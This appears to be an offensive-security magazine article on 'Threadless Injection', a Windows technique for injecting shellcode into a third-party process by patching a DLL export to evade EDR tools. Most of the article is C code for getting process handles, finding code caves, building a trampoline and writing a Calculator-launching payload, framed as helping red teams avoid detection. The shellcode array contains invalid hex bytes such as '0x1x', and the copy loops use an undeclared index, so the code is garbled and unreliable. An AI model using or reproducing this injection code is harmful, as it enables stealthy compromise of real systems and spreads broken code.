Threadless Injection. Injecting shellcode into third-party processes to circumvent EDR

This article discusses Threadless Injection: a technique making it possible to make injections into third-party processes. At the time of writing, it effectively worked on Windows 11 23H2 x64 running on a virtual machine isolated from the network with OS security features enabled.

info

Also see my previous article describing the Process Ghosting injection technique.

The standard shellcode injection procedure and subsequent shellcode execution involve the following steps:

Get a process handle (OpenProcess and NtOpenProcess);
Allocate memory for payload (VirtualAllocEx and NtMapViewOfSection);
Write payload to the allocated memory (WriteProcessMemory and Ghost Writing); and
Execute shellcode (CreateRemoteThread and NtQueueApcThread).

Needless to say that this sequence of actions is well-known to EDR tools; if some program implements it, a red flag is immediately raised, and the process is terminated.

Is it possible to write code that performs the same actions but doesn’t directly use the above-listed WinAPI functions? For the first three steps, such a task is feasible, but when it comes to shellcode execution, problems arise. If a program directly calls the CreateRemoteThread/NtQueueApcThread functions, EDR will ring the alarm bell with a 100% guarantee.

So, to fool the defense, this chain of actions has to be broken somehow. For example, you can try to intercept some API calls in a third-party app, in an exported DLL function, and then make this function work for you…

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

The idea is as follows: you patch network functions of some legitimate software that already interacts with the network and then use these functions to communicate with your network resources. This is the essence of the Threadless Injection technique: you patch exported functions of a dynamic library used by a third-party process so that your code is executed when these functions are called. Its implementation involves the following steps:

Find a code cave that can accommodate your shellcode and trampoline;
Write the shellcode and trampoline to this memory area;
Patch an exported DLL function to make it execute your code; and
Wait for this function to be called, which will trigger shellcode execution.

But dynamic libraries can contain hundreds and thousands of functions, and a randomly selected function might be unsuitable for your purposes. Who can guarantee that it will be called within a reasonable period of time (or will be called at all)?..

To solve this issue, you have to examine the software you are going to use to intercept an exported function. Ideally, you need an app that calls certain DLL functions on a regular basis (e.g. when it accesses its temporary file on the disk and writes intermediate results to it or checks the availability of its servers on the network by calling the respective API at a certain interval). If you find such a function, you can be sure that the required call will occur before long.

On the other hand, this rule shouldn’t be abused: if an app calls some API too often (e.g. several times per second), and you try to intercept such a call, glitches are inevitable.

To conduct such a research, let’s use API Monitor. This program shows in real time how a WinAPI is called and what actions in the test program affect this call. In addition, you can see what DLLs are attached to the process and what APIs do they implement (i.e. you see not just a list of WinAPIs whose origin is unknown). Based on the monitoring data, you can decide which function from the library export is suitable for your purposes and should be intercepted.

Once you examine the test program and identify the required WinAPIs, you can start coding.

Coding

Let’s implement each step required to perform Threadless Injection in code.

First, you have to get a handle of the target process by its name:

HANDLE hProc = NULL;
LPCWSTR ps_name;
DWORD *procID;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
HANDLE process_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (!process_snap) return NULL;
if (Process32First(process_snap, &pe32)) {
    do {
        if (_wcsicmp(pe32.szExeFile, ps_name) == 0) {
            *procID = pe32.th32ProcessID;
            hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, *procID);
            if (!hProc) continue;
            return hProc;
        }
    } while (Process32Next(process_snap, &pe32));
}

Then you load the selected dynamic library whose export contains the API function required for your purposes (e.g. kernelbase.dll).

    HMODULE hModule = GetModuleHandleW(L"kernelbase.dll");
    if (hModule == NULL)
        hModule = LoadLibraryW(L"kernelbase.dll");

Next, you get the address of your API in the DLL:

  // victim_export_func is a function from the kernelbase.dll export that will be hooked
    void* dll_export_fun_addr = GetProcAddress(hModule, victim_export_func);
    if (dll_export_fun_addr == NULL) return 1;

Searching for a code cave (i.e. memory area where you can write your data):

    UINT_PTR  addr_of_codecave;
    uint64_t function_addr;
    BOOL gotchaCave;
  // Start search
    for (addr_of_codecave = (function_addr & 0xFFFFFFFFFFF70000) - 0x70000000;
      // Address range
        addr_of_codecave < function_addr + 0x70000000;
        // Memory browsing increment
        addr_of_codecave += 0x10000)
    {
        LPVOID lpAddr = VirtualAllocEx(hProc,
                addr_of_codecave,
                size,
                MEM_COMMIT | MEM_RESERVE,
                PAGE_EXECUTE_READWRITE);
        if (lpAddr == NULL) continue;
        gotchaCave = TRUE;
        break;
    }
    if (gotchaCave == TRUE) return addr_of_codecave;

The next step involves manipulations with the trampoline and other arithmetic. To make it clear, let’s denote the trampoline and the payload. I am going to use a standard payload frequently used in PoC demos that starts Calculator. The trampoline balances the stack, saves registers, and restores them after calling the payload:

unsigned char tramp_to_shellcode[] = {
        0x58, 0x48, 0x83, 0xE8, 0x05, 0x50,
        0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
        0x41, 0x52, 0x41, 0x53, 0x48, 0xB9,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x48, 0x89, 0x08, 0x48,
        0x83, 0xEC, 0x40, 0xE8, 0x11, 0x00,
        0x00, 0x00, 0x48, 0x83, 0xC4, 0x40,
        0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,
        0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF,
        0xE0, 0x90
};
unsigned char shellcode[] = {
        0x53, 0x56, 0x57, 0x55, 0x54, 0x58,
        0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A,
        0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C,
        0x63, 0x54, 0x59, 0x48, 0x29, 0xD4,
        0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B,
        0x76, 0x18, 0x48, 0x8B, 0x76, 0x10,
        0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48,
        0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C,
        0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74,
        0x1x, 0x20, 0x48, 0x01, 0xFE, 0x8B,
        0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C,
        0x1x, 0x8D, 0x52, 0x02, 0xAD, 0x81,
        0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45,
        0x7x, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
        0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE,
        0x4x, 0x01, 0xF7, 0x99, 0xFF, 0xD7,
        0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D,
        0x5x, 0x5E, 0x5B, 0xC3
};

Reading the beginning of the function exported from the DLL and configuring the trampoline using the obtained data:

    int64_t originalBytes = *(int64_t*)dll_export_fun_addr;
  // The trampoline isn't damaged: the space in it at this offset is reserved by zeros
    *(uint64_t*)(tramp_to_shellcode + 0x12) = originalBytes;

Configuring memory and granting it the PAGE_EXECUTE_READWRITE rights to set the hook:

DWORD saveProtectFlags = 0;
if (!VirtualProtectEx(hProc, dll_export_fun_addr, 8, PAGE_EXECUTE_READWRITE, &saveProtectFlags)) return 1;

Creating a hook (call) in the function exported by the attacked library and configuring it:

// Call function opcode
unsigned char call_opcode_to_shell[] = { 0xe8, 0, 0, 0, 0 };
int call_addr = (remoteAddress - ((UINT_PTR)dll_export_fun_addr + 5));
// Configuring the call
*(int*)(call_opcode_to_shell + 1) = call_addr;

Writing the trampoline and payload and then changing the target memory attributes: first to PAGE_EXECUTE_READWRITE and then back to PAGE_EXECUTE_READ (when the job is done):

    VirtualProtectEx(hProc,
            call_opcode_to_shell,
            sizeof(call_opcode_to_shell),
            PAGE_EXECUTE_READWRITE,
            NULL);
    if (!WriteProcessMemory(hProc,
            dll_export_fun_addr,
            call_opcode_to_shell,
            sizeof(call_opcode_to_shell),
            &numOfWrittenBytes))
    return 1;
    unsigned char mypayload[sizeof(tramp_to_shellcode) + sizeof(shellcode)];
  // In these two loops, one large payload containing both the shellcode and the trampoline is created.
    for (size_t x = 0; x < sizeof(tramp_to_shellcode); ++x)
        mypayload[i] = tramp_to_shellcode[i];
    for (size_t x = 0; x < sizeof(shellcode); ++x)
        mypayload[sizeof(shellcode) + i] = shellcode[i];
  // Change memory access flags to enable writing
    if (!VirtualProtectEx(hProc,
            remoteAddress,
            sizeof(mypayload),
            PAGE_READWRITE,
            &saveProtectFlags))
    return 1;
  // Write payload
    if (!WriteProcessMemory(hProc,
            remoteAddress,
            mypayload,
            sizeof(mypayload),
            &numOfWrittenBytes))
    return 1;
  // Revert memory access rights
    if (!VirtualProtectEx(hProc,
            remoteAddress,
            sizeof(mypayload),
            PAGE_EXECUTE_READ,
            &saveProtectFlags))
    return 1;

Congrats! Now all you have to do is wait for the app to call the patched function. You won’t have to wait for long since the modified API is called on a regular basis (as confirmed by API Monitor).

Conclusions

Now you are familiar with the Threadless Injection technique that can be implemented without explicitly calling thread creation functions. This breaks the standard injection stereotype and enables you to avoid detection and continue doing your job.

Of course, the above code is just a demonstration – a template that requires significant improvements to achieve true invisibility. This technique is neither a panacea nor a silver bullet that completely conceals your code. Remember: to give the Red Team a chance to win, all available techniques (injections, API calls, code obfuscation, etc., etc.) should be used in deadly combinations. Good luck!

2022.06.01 — Routing nightmare. How to pentest OSPF and EIGRP dynamic routing protocols

The magic and charm of dynamic routing protocols can be deceptive: admins trust them implicitly and often forget to properly configure security systems embedded in these protocols. In this…

Full article →

2022.06.03 — Challenge the Keemaker! How to bypass antiviruses and inject shellcode into KeePass memory

Recently, I was involved with a challenging pentesting project. Using the KeeThief utility from GhostPack, I tried to extract the master password for the open-source KeePass database…

Full article →

2022.06.01 — Cybercrime story. Analyzing Plaso timelines with Timesketch

When you investigate an incident, it's critical to establish the exact time of the attack and method used to compromise the system. This enables you to track the entire chain of operations…

Full article →

2023.03.03 — Nightmare Spoofing. Evil Twin attack over dynamic routing

Attacks on dynamic routing domains can wreak havoc on the network since they disrupt the routing process. In this article, I am going to present my own…

Full article →

2023.07.07 — Evil Ethernet. BadUSB-ETH attack in detail

If you have a chance to plug a specially crafted device to a USB port of the target computer, you can completely intercept its traffic, collect cookies…

Full article →

2022.02.09 — Kernel exploitation for newbies: from compilation to privilege escalation

Theory is nothing without practice. Today, I will explain the nature of Linux kernel vulnerabilities and will shown how to exploit them. Get ready for an exciting journey:…

Full article →

2022.04.04 — Fastest shot. Optimizing Blind SQL injection

Being employed with BI.ZONE, I have to exploit Blind SQL injection vulnerabilities on a regular basis. In fact, I encounter Blind-based cases even more frequently…

Full article →

2023.06.08 — Croc-in-the-middle. Using crocodile clips do dump traffic from twisted pair cable

Some people say that eavesdropping is bad. But for many security specialists, traffic sniffing is a profession, not a hobby. For some reason, it's believed…

Full article →

2023.01.22 — Top 5 Ways to Use a VPN for Enhanced Online Privacy and Security

This is an external third-party advertising publication. In this period when technology is at its highest level, the importance of privacy and security has grown like never…

Full article →

2022.06.03 — Playful Xamarin. Researching and hacking a C# mobile app

Java or Kotlin are not the only languages you can use to create apps for Android. C# programmers can develop mobile apps using the Xamarin open-source…

Full article →